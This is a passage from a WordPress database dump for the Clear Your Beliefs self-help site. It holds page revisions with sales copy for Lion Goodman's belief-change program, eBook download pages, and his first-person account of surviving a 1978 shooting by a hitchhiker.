searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;margin: 0px 5%">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://clearyourbeliefs.com/program" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-16 01:33:21', '2014-12-16 06:33:21', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(2060, 2, '2014-12-16 01:34:04', '2014-12-16 06:34:04', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;margin: 0px 5%">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://clearyourbeliefs.com/program" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-16 01:34:04', '2014-12-16 06:34:04', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(2067, 2, '2014-12-29 23:08:42', '2014-12-30 04:08:42', '&nbsp;\r\n<p style="text-align: left;">  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png">                                                     <img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"></p>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook, </strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:08:42', '2014-12-30 04:08:42', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2068, 2, '2014-12-29 23:19:58', '2014-12-30 04:19:58', '&nbsp;\r\n<p style="text-align: left;">  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png">                                                                    <img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:19:58', '2014-12-30 04:19:58', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2069, 2, '2014-12-29 23:20:30', '2014-12-30 04:20:30', '&nbsp;\r\n<p style="text-align: left;">  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png">                                                              <img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:20:30', '2014-12-30 04:20:30', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2071, 2, '2014-12-29 23:54:47', '2014-12-30 04:54:47', '[vc_row][vc_column][vc_column_text]\n<h3 style="text-align: center;"><img class="aligncenter size-full wp-image-3086" src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screen-Shot-2017-08-01-at-9.42.51-PM.png" alt="" width="737" height="244" /></h3>\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/12/films_kindness3.jpg"><img class="alignleft wp-image-2414 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/films_kindness3.jpg" alt="films_kindness3" width="200" height="298" /></a>\n\nDuring the summer of 1978, I was working as a traveling salesman. I drove through the southwestern states, wandering through cities and towns, selling jewelry and giftware to stores along the way.\n\nI had just completed a productive week in Las Vegas, where I made many sales. I felt pretty good. My next destination was Los Angeles, just hours away.\n\nIn the middle of the Mojave Desert, I saw a motorist staring helplessly into the engine of his stalled car. The sun was beating down in 100+ degree heat.  As was my habit, I pulled over to offer him assistance. His car was dead, and he was frustrated. He had no money to fix the car, and no way out of his situation. I felt sorry for him. So I invited him to travel with me. I was headed into L.A., his destination, and I had room in the van.\n\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. He traveled with me for three days, and over time, I grew to trust him. I sent him on errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear.  He seemed calm, and mostly satisfied.\n\nOn our third night of travel, we camped out next to Puddingstone Reservoir, outside of Claremont. I was sitting on the floor in the back of my large van, moving things around in the cupboards to make more room for all the stuff that was piled up – my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear. I was in a practical frame of mind, focused on my task, listening to the music that Ray was playing on the radio at the front of the van.\n\nThere was a sudden, loud explosion. I felt a sharp, searing blow to the top of my head. Had the gas stove exploded, I wondered? I looked up, but it was intact. Then I looked at Ray. He was sitting in the driver’s seat, and I saw a black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! My first thought was, "He''s warning me – he''s going to rob me." That suddenly seemed just fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\n\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\n\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard a soft voice in my mind say, “Relax. It’s out of your control. Keep breathing, and stay awake.” I began to breathe slowly, assessing the situation.\n\nMy thoughts turned to my inevitable death. There was nothing I could do to change the sequence of events. So my attention turned to God. “Thy will, not my will, be done,” I thought. I let go of my body, and my tension, relaxing and slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\n\nI began to prepare for death. I didn''t want to die angry, upset, or incomplete. I began by asking for forgiveness – from all those I had hurt during my 26 years of life. I then offered my own forgiveness to everyone who had hurt me throughout my life. This began a full-color fast-reverse movie reel of my life, back to my birth. I thought about my parents, my brothers and sisters, my lovers, and my many good friends. I said goodbye. I said, “I love you.”\n\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the wood cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If the gun was a revolver, there were three more bullets. I hoped that the gun wasn’t a semi-automatic with a full clip.\n\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my ideas, my freedom — all became worthless, meaningless. In the face of death, it was just dust in the wind.\n\nAll I had of value at that moment was my body, and my life, and those would soon be gone. My attention was focused on the spark of light I called my Self. My consciousness began to expand outward, extending my awareness in space and time. I heard those instructions again: STAY AWAKE AND KEEP BREATHING.\n\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed into me from that Source, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history to my birth, and forward to my death. I could see the next bullet, a short distance into the future, leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe to see life from this expanded perspective. I was floating above the van, as a point of consciousness, like looking down into a dollhouse, seeing all the rooms at once. Every detail was in sharp relief, both real and unreal at the same time. I looked into the warm and welcoming golden light with calm acceptance. I was going Home.\n\nThe fourth explosion shattered the silence, and my head was pushed violently to my right side. The ringing in my ears was deafening. Warm blood rushed down my head, into my eyes and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. I was still surrounded by light, love, and peace. "That''s interesting!," I thought. "I''m still alive!" I began to look inside my skull, trying to find the holes. Perhaps I could see light through them? Knowing myself well, I began to inventory my feelings, abilities, thoughts, and sensations. I was looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\n\nAt that moment, I realized that I wanted to to look at my assassin – the bringer of death – directly in the eyes. I picked up my head and faced him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\n\nI didn''t know the answer to his question. “Here I am.” I said quietly, still in my expanded state of consciousness.\n\n“That’s too weird! This is just like my dream this morning!"\n\n"What dream?," I asked.\n\nHe was now shouting. "In my dream, I kept shooting this guy, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\n\nThis was very strange. "Who is writing this script?," I wondered. I knew that if I could keep him talking, he might not shoot again. I began to speak slowly and calmly, trying to settle him down. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why four bullets hadn’t finished me off.\n\nBlood continued to ooze down my face. I could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\n\n“Maybe I’m not supposed to die,” I said calmly.\n\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “Now I don’t know what to do!”\n\n“What do you want to do?” I asked.\n\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.”\n\nHe seemed worried, uncertain. He was beginning to slow down, less adrenalin coursing through his veins, less jumpy.\n\n“Why did you want to kill me?” I asked.\n\n“Because you have everything, and I have nothing. And I''m tired of having nothing! This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\n\n”What do you want to do now, Ray?” I asked.\n\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\n\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, quietly. I didn''t want him to feel out of control. It had to be his idea, not mine. I knew his anger sprang from feeling out of control, and I didn’t want to make him more angry.\n\n“Why were you so nice to me, man?” he asked plaintively.\n\n“Because you’re a person, Ray.”\n\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he was a little boy, disappointed in himself for failing. Ashamed.\n\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\n\nNow he was asking my permission. “Okay,” I said softly. He began stacking boxes, filled with samples, around me. “Are you okay?” he asked.\n\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.” He was expressing genuine care. I quieted the hope springing out of me.\n\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\n\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was strong, and certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van back up on the dirt road, find the pavement and move forward into the night – toward my freedom and salvation.\n\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward an even more horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were more than an hour away from Los Angeles. As I sat alone in the back of the dark van, listening to the sounds of the highway, I replayed the scenes, one by one, analyzing the past three days. I was trying to understand what had happened, and why. It didn''t make any kind of sense. I had treated Ray only with kindness and respect, and he turned on me. I had welcomed a crazy person with a gun into my life.\n\nAfter an hour or so of deep contemplation and questioning everything, I felt the van slow, pull over and stop. The engine turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\n\nRay walked back toward me with his gun in his hand. He sat down on the platform bed next to me, and turned toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly. "Oh shit," I thought. I tried to remain calm.\n\n“Why?” I asked quietly.\n\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\n\nBack in jail? Not only was I with an armed madman, but an ex-con as well.\n\n“They won’t put you in jail if you take me to the hospital, Ray,” I said slowly, still feigning injury, passivity. I realized that an opening might occur, a moment when I could surprise him, overpower him, and take away his gun. If he didn’t know I was okay, and strong, I had an advantage.\n\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\n\n“We don’t have to tell them. I won’t tell them.”\n\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.”\n\nHe seemed sad, and desperate. This was clearly not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, or whether it would be enough to push myself out and wrestle him down. He was small, but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\n\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\n\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\n\nI was silent. That didn’t work. What could I do to escape? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\n\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He expressed genuine concerned.\n\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\n\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\n\nNot if, but when.\n\n“What would you do with all this stuff if you had it, Ray?” I asked.\n\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply as he talked about growing up in poverty in East L.A., with poverty everywhere around him. He talked about his anger at the schoolteachers who made him feel stupid. He talked about his father who drank too much and beat him. He talked about becoming a tough guy on the streets, and how he found a way out. He joined the Army. That was supposed to fix everything. But he couldn’t stand being told what to do all the time, so he went AWOL.\n\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer. That’s why he had to leave L.A., because they were looking for him, to kill him. He told me that he stole his father’s gun, and some money, before he left. Then his car broke down, and he realized there was no place to hide.\n\nHe had decided to turn back. If he did one more rip-off, he could get rich, and pay off the dealer. He just needed one hit, one sucker. If his target was rich enough, he could start over and be somebody. So he decided to kill whoever stopped to help him.\n\nI had apparently volunteered.\n\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. I could hear the sound of chirping birds, which was the most beautiful sound I had ever heard. I was grateful to be alive.\n\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch,” I told him. I had been sitting in the same position for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door. My lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\n\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\n\n“Okay, Ray. You just tell me what to do and I’ll do it.”\n\nI wanted to remind him that he was in control. Don’t let him feel out of control. Look for an opening.\n\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes! Everything was shining, as if made of sparkling crystal.\n\nWe had stopped on a residential street next to an embankment, which led down to a small pond. He gestured with his gun that I should walk down the dirt trail that led to the water. As I clambered down the steep incline, I wondered, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\n\nI felt weak and vulnerable, yet at the same time, immortal, impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced him. He looked at me curiously.\n\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\n\nMy answer was my first thought: “I’d throw it out there, into the water.” I pointed to the center of the pond.\n\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\n\n“No, why should I be mad?”\n\n“I shot you, man!  You ought to be angry! I’d be fucking furious! Are you sure you wouldn’t want to kill me if I gave you this gun?” He held out the gun again, as if inviting me to take it, and kill him.\n\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\n\n“I don’t understand you, man. You are really weird, really different than anyone I’ve ever met before. I don’t know why you didn’t die when I shot you, man.”\n\nSilence. That question was best left unanswered.\n\nAs we stood at the water’s edge, I realized that Ray had undergone a profound transformation – as profound as the one I had undergone. We were both different people than we had been the day before.\n\n“What should we do now, Ray?”\n\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\n\nWe continued to talk, as we walked back up the hill to the van, where we sat together, seeking a solution to this dilemma. We explored the possibilities – what could we agree to? I made suggestions, and he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise. A way out.\n\nUltimately, we found a bargain we could both agree to: I would let him go, and he would let me go. I promised not to turn him into the police, or report the incident, under one condition – he had to promise that he would never do anything like this again.\n\nHe promised. We shook hands on the deal.\n\nWhat choice did he have?\n\nAs the sun rose over the hills, and the heat of the day began, we climbed back up to the front of the van. I sat in the passenger seat. He drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and two watches I thought he could pawn. We got out of the van and walked across the street to a bus stop.\n\nThe sun shone down on us. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\n\nWe shook hands one final time. I smiled at him, and he look confused. I said goodbye, and walked away.\n\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair from my scalp, and sewed stitches. He asked me how it had happened. I told him, “I was shot, four times.”\n\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\n\n“Yes, I know,” I said.\n\nHe said I was lucky, but I knew it was more than luck. I felt blessed. I was still full of love, and light.\n\nI didn’t go to the police. I had made a promise, and had received a promise in return.\n\n<strong>I kept my promise. </strong>\n\n<strong>And I believe that Ray kept his.</strong>\n<p style="text-align: center;">. . .</p>\n&nbsp;\n\n<strong>About the Author</strong>\n\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <a href="http://www.clearyourbeliefs.com"><strong><em>Clear Your Beliefs</em></strong></a> program, and teaches his methodology to coaches and therapists around the world through the <a href="http://www.clearbeliefs.com"><em>Clear Beliefs Coach Training</em></a>.  He is the author of numerous books, including <em>Clear Your Beliefs,</em> and <a href="http://www.creatingonpurpose.net"><em>Creating On Purpose</em></a> (with Anodea Judith).\n\nLion provides personal, transformational coaching and healing to people worldwide. He helps them clear what''s in their way so they can fulfill their dreams and manifest their life purpose. He  works with entrepreneurs and business leaders through the <a href="http://www.luminaryleadership.net">Luminary Leadership Institute</a>, helping them hone their virtues and embody their True Self. He also loves to work with young people, like Ray, who are seeking a better life, and he often lectures at San Francisco State University, Yale Summer Explo, and San Quentin Prison.\n\nThis story was first published in the book, <em>I Thought My Father Was God… and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). It was used as the basis for a screenplay for the award-winning film, <strong><em>“The Kindness of Strangers.”</em> </strong> Directed by Claudia Myers, which won “Best Film” at the Rosebud Film Festival in Virginia. The 20-minute film can be viewed here: <a href="http://www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\n\nI would enjoy hearing your feedback or questions. Write to me at <a href="mailto:liongoodman@gmail.com">liongoodman@gmail.com</a>.\n\n© 2008 by Lion Goodman. All rights reserved.[/vc_column_text][/vc_column][/vc_row]', 'My Near Death Story', '', 'publish', 'closed', 'closed', '', 'my-near-death-story', '', '', '2017-08-01 23:45:39', '2017-08-02 04:45:39', '', 0, 'http://clearyourbeliefs.com/?page_id=2071', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2072, 2, '2014-12-29 23:54:47', '2014-12-30 04:54:47', '<h1 style="text-align: center;">A Shot In The Light</h1>\r\n<h3 style="text-align: center;">(A true story)</h3>\r\n<h2 style="text-align: center;">by Lion Goodman</h2>\r\n&nbsp;\r\n\r\nIt happened during the summer of 1978. I was traveling through the Southwest, selling jewelry and giftware, Austrian crystals to feather earrings. On my way toward Los Angeles from Las Vegas, I stopped to help a motorist whose car had broken down in the Mojave Desert. He was down on his luck, had no plans, and nowhere to go. So I invited him to travel with me.\r\n\r\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. I felt sorry for him, and in the three days we were together, I grew to trust him. I sent him on small errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear. He seemed calm and mostly satisfied.\r\n\r\nThe third night, we were camped out next to Puddingstone Reservoir east of Claremont. I was sitting on the floor in the back of the large van, moving things around in the cupboards to make more room for my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear.\r\n\r\nThere was a loud explosion, and I felt a sharp, searing blow to the top of my head. Had the gas stove exploded? I looked up, but it was intact. Then I looked at Ray, sitting in the driver’s seat, and I saw the black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! At first, I thought he was warning me – that he was going to rob me. That suddenly seemed fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\r\n\r\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\r\n\r\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard myself whisper “Relax. It’s out of your control. Breathe. Stay awake.” My thoughts turned to death, and to God. “Thy will, not my will, be done.” I let my body go, and I relaxed, slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\r\n\r\nI began preparing for my death. I asked to be forgiven by anyone I had hurt. I offered my forgiveness to everyone who had hurt me throughout my life. It was a full-color fast-reverse movie reel of my entire twenty-six years. I thought about my parents, my brothers and sisters, my lovers, my friends. I said 